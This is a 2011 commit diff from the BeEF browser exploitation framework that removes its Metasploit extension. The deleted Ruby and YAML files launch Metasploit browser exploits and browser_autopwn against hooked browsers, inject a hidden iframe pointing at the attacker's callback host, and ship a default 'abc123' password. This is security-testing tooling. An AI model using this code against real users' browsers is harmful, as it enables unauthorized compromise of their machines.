Removing old Metasploit extension

git-svn-id: https://beef.googlecode.com/svn/trunk@1258 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
passbe
2011-09-02 23:58:55 +00:00
parent 0403ea0853
commit 97b244d61a
6 changed files with 0 additions and 648 deletions

@@ -1,33 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load xmlrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
beef:
extension:
metasploit:
name: 'Metasploit'
enable: true
host: "127.0.0.1"
url-path: "/RPC2"
port: 55553
user: "msf"
pass: "abc123"
callback_host: "192.168.84.1"
autopwn_url: "autopwn"

@@ -1,96 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
module DbMigration
extend BeEF::API::Migration
def self.migrate_commands
msf = BeEF::Extension::Metasploit::RpcClient.instance
# verify that metasploit is enabled and we are logged in.
if(msf.is_enabled && msf.login())
Thread.new() {
begin
sploits = msf.browser_exploits()
sploits.each do |sploit|
if not BeEF::Core::Models::CommandModule.first(:name => sploit)
mod = BeEF::Core::Models::CommandModule.new(:path => "Dynamic/Msf", :name => sploit)
mod.save
if mod.dynamic_command_info == nil
msfi = msf.get_exploit_info(sploit)
st = sploit.split('/').first
targets = []
os_name = BeEF::Core::Constants::Os::match_os(st)
browsers = BeEF::Core::Constants::Browsers::match_browser(msfi['name'] + msfi['targets'].to_json)
targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
browsers.each do |bn|
targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
}
end
targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
msfci = BeEF::Core::Models::DynamicCommandInfo.new(
:name => msfi['name'],
:description => msfi['description'],
:targets => targets.to_json)
mod.dynamic_command_info = msfci
mod.save
end
end
end
payloads = msf.payloads()
payloads.each do |payload|
if not BeEF::Core::Models::DynamicPayloads.first( :name => payload)
pl = BeEF::Core::Models::DynamicPayloads.new( :name => payload)
pl.save
opts = msf.payload_options(payload)
opts.keys.each do |opt|
next if opts[opt]['advanced'] or opts[opt]['evasion']
pl.dynamic_payload_info.new(:name => opt, :description => opts[opt]['desc'], :required => opts[opt]['required'], :value => opts[opt]['default'])
end
pl.save
end
end
# Catching and printing exceptions in regards to migration
# of Metasploit exploits into BeEF
rescue Exception => e
puts e.message
puts e.backtrace
end
msf.launch_autopwn()
}#thread end
end
end
end
end
end
end

@@ -1,33 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
extend BeEF::API::Extension
@short_name = @full_name = 'metasploit'
@description = 'use metasploit exploits with beef'
end
end
end
require 'extensions/metasploit/filters'
require 'extensions/metasploit/rpcclient'
require 'extensions/metasploit/msfcommand'
require 'extensions/metasploit/dbmigration'

@@ -1,28 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# We extend the default filters to include the filters for Metasploit
#
module BeEF
module Filters
def self.is_valid_msf_payload_name?(name)
return false if only?("a-z_/", name)
true
end
end
end

@@ -1,228 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Modules
module Commands
class Msf < BeEF::Core::Command
def initialize
h = {
'name' => 'Generic Metasploit Exploit',
'description' => 'This module will launch a Metasploit exploit against the host',
'category' => 'Metasploit',
'author' => ['sussurro']
}
BeEF::Core::Configuration.instance.set('beef.module.gmsf', h)
super('gmsf')
end
def callback
save({'result' => @datastore['result']})
end
#
def update_info(id)
mod = BeEF::Core::Models::CommandModule.first(:id => id)
msfinfo = nil
targets = []
if mod.dynamic_command_info == nil
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf.login()
msfinfo = msf.get_exploit_info(mod.name)
st = mod.name.split('/').first
puts "st: " + st
os_name = BeEF::Core::Constants::Os::match_os(st)
browsers = BeEF::Core::Constants::Browsers::match_browser(msfinfo['name'] + msfinfo['targets'].to_json)
targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
browsers.each do |bn|
targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
}
end
targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
mod.dynamic_command_info = BeEF::Core::Models::DynamicCommandInfo.new(
:name => msfinfo['name'],
:description => msfinfo['description'],
:targets => targets.to_json)
mod.save
else
msfinfo = mod.dynamic_command_info
targets = JSON.parse(msfinfo['targets'])
end
@info['Name'] = msfinfo['name']
@info['Description'] = msfinfo['description']
@info['MsfModName'] = mod.name
@info['mod-id'] = mod.id
@info['msfid'] = mod.name
@target = targets
end
def update_data()
modname = @info['MsfModName']
msf = BeEF::Extension::Metasploit::RpcClient.instance
if not msf.is_enabled
@info['Description'] += "<BR>" + "*"*15 + "WARNING" + "*"*15 + "<BR>"
@info['Description'] += "Metasploit capapbilities have been disabled, please verify your configuration or if msf_enabled = 1 then check the BeEF console for errors"
return
end
msfoptions = msf.get_options(modname)
msfoptions.keys.each { |k|
next if msfoptions[k]['advanced'] == true
next if msfoptions[k]['evasion'] == true
@info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => msfoptions[k]['desc']}
case msfoptions[k]['type']
when "string","address","port"
msfoptions[k]['default'] = rand(32**20).to_s(32) if k == "URIPATH"
@info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || msfoptions[k]['default'])}
when "bool"
@info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k }
when "enum"
enumdata = []
msfoptions[k]['enums'].each { |e|
enumdata << [e]
}
@info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => enumdata, 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || msfoptions[k]['default'])}
end
}
msfpayloads = msf.get_payloads(modname)
return if not msfpayloads or not msfpayloads['payloads']
payloads = msfpayloads['payloads']
pl = []
pl << [(oc_value('PAYLOAD') || 'generic/shell_bind_tcp')]
payloads.each { |p|
pl << [p]
}
@info['Data'] << { 'name' => 'PAYLOAD',
'type' => 'combobox',
'anchor' => '95% -100',
'ui_label' => 'Payload',
'store_type' => 'arraystore',
'store_fields' => ['payload'],
'store_data' => pl,
'valueField' => 'payload',
'displayField' => 'payload' ,
'autoWidth' => true,
'mode' => 'local',
'reloadOnChange' => true, # reload payloads
'defaultPayload' => "generic/shell_bind_tcp", # default combobox value
'emptyText' => "select a payload..."
}
@info['Data'] << { 'name' => 'mod_id' , 'id' => 'mod_id', 'type' => 'hidden', 'value' => @info['mod-id'] }
end
def get_payload_options(payload_name)
# get payload options from metasploit
msf_xmlrpc_clinet = BeEF::Extension::Metasploit::RpcClient.instance
msf_xmlrpc_clinet.login()
payload_options = msf_xmlrpc_clinet.payload_options(payload_name)
info = {}
info['Data'] = []
payload_options.keys.each { |k|
next if payload_options[k]['advanced'] == true
next if payload_options[k]['evasion'] == true
info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => payload_options[k]['desc']}
case payload_options[k]['type']
when "string","address","port","raw","path", "integer"
payload_options[k]['default'] = "127.0.0.1" if k == "RHOST"
info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || payload_options[k]['default'])}
when "bool"
info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k }
when "enum"
info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => payload_options[k]['enums'], 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || payload_options[k]['default'])}
else
# Debug output if the payload option type isn't found
puts "K => #{k}\n"
puts "Status => #{payload_options[k]['advanced']}\n"
puts "Type => #{payload_options[k]['type']}\n"
puts payload_options[k]
end
}
# turn results into JSON
payload_options_json = []
payload_options_json[1] = JSON.parse(info.to_json)
JSON.parse(info.to_json)
end
def launch_exploit(opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf.login()
ret = msf.launch_exploit(@info['msfid'],opts)
@output = "<script>alert('#{ret['uri']}')</script>\n" if ret['result'] == 'success'
ret
end
def output
if @datastore
@datastore['command_url'] = BeEF::Core::Server.instance.get_command_url(@default_command_url)
@datastore['command_id'] = @command_id
end
return "
beef.execute(function() {
var result;
try {
var sploit = beef.dom.createInvisibleIframe();
sploit.src = '#{datastore['sploit_url']}';
} catch(e) {
for(var n in e)
result+= n + ' ' + e[n] ;
}
});"
end
def callback
content = {}
content['Exploit Results'] = @datastore['result']
save content
end
end
end
end
end

@@ -1,230 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
#
# XML RPC Client for Metasploit
#
class RpcClient < ::XMLRPC::Client
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@enabled = (@config.get('beef.extension.metasploit.enable'))
return if (not @enabled)
host = @config.get('beef.extension.metasploit.host')
path = @config.get('beef.extension.metasploit.url-path')
port = @config.get('beef.extension.metasploit.port')
@un = @config.get('beef.extension.metasploit.user')
@pw = @config.get('beef.extension.metasploit.pass')
@apurl = @config.get('beef.extension.metasploit.autopwn_url') || "autopwn"
@lock = false
if(not host or not path or not port or not @un or not @pw)
print_error 'There is not enough information to initalize Metasploit connectivity at this time'
print_error 'Please check your options in config.yaml to verify that all information is present'
@enabled = false
end
@token = nil
@lastauth = nil
super(host,path,port)
end
def get_lock()
sleep 0.2 while @lock
@lock = true
end
def release_lock()
@lock = false
end
# is metasploit enabled in the configuration
def is_enabled
@enabled
end
# login into metasploit
def login
get_lock()
res = self.call("auth.login", @un ,@pw )
if(not (res and res['result'] == "success"))
@enabled = false
release_lock()
print_error 'Could not authenticate to Metasploit xmlrpc.'
return false
end
print_info 'Successful connection with Metasploit.' if not @lastauth
@token = res['token']
@lastauth = Time.now
release_lock()
true
end
# sends commands to the metasploit xml rpc server
def call(meth, *args)
return if not @enabled
if(meth != "auth.login")
self.login() if not @token
args.unshift(@token)
end
begin
super(meth, *args)
rescue Errno::ECONNREFUSED
print_error "Connection to Metasploit backend failed."
@enabled = false
return false
rescue XMLRPC::FaultException => e
if e.faultCode == 401 and meth == "auth.login"
print_error "Your username and password combination was rejected by the Metasploit backend server"
@enabled = false
elsif e.faultCode == 401
res = self.login()
else
print_error "An unknown exception has occured while talking to the Metasploit backend."
print_error "The Exception text is (#{e.faultCode} : #{e.faultString}."
print_error "Please check the Metasploit logs for more details."
end
return false
rescue Exception => e
print_error "An unknown exception (#{e}) has occured while talking to the Metasploit backend."
print_error "Please check the Metasploit logs for more details."
return false
end
end
def browser_exploits()
return if not @enabled
get_lock()
res = self.call('module.exploits')
return [] if not res or not res['modules']
mods = res['modules']
ret = []
mods.each do |m|
ret << m if(m.include? '/browser/')
end
release_lock()
ret.sort
end
def get_exploit_info(name)
return if not @enabled
get_lock()
res = self.call('module.info','exploit',name)
release_lock()
res || {}
end
def get_payloads(name)
return if not @enabled
get_lock()
res = self.call('module.compatible_payloads',name)
release_lock()
res || {}
end
def get_options(name)
return if not @enabled
get_lock()
res = self.call('module.options','exploit',name)
release_lock()
res || {}
end
def payloads()
return if not @enabled
get_lock()
res = self.call('module.payloads')
release_lock()
return {} if not res or not res['modules']
res['modules']
end
def payload_options(name)
return if not @enabled
get_lock()
res = self.call('module.options','payload',name)
release_lock
return {} if not res
res
end
def launch_exploit(exploit,opts)
return if not @enabled
get_lock()
begin
res = self.call('module.execute','exploit',exploit,opts)
rescue Exception => e
print_error "Exploit failed for #{exploit} \n"
release_lock()
return false
end
release_lock()
uri = ""
if opts['SSL']
uri += "https://"
else
uri += "http://"
end
uri += @config.get('beef.extension.metasploit.callback_host') + ":" + opts['SRVPORT'] + "/" + opts['URIPATH']
res['uri'] = uri
res
end
def launch_autopwn
return if not @enabled
opts = {
'LHOST' => @config.get('beef.extension.metasploit.callback_host') ,
'URIPATH' => @apurl
}
get_lock()
begin
res = self.call('module.execute','auxiliary','server/browser_autopwn',opts)
rescue Exception => e
print_error "Failed to launch autopwn\n"
release_lock()
return false
end
release_lock()
end
end
end
end
end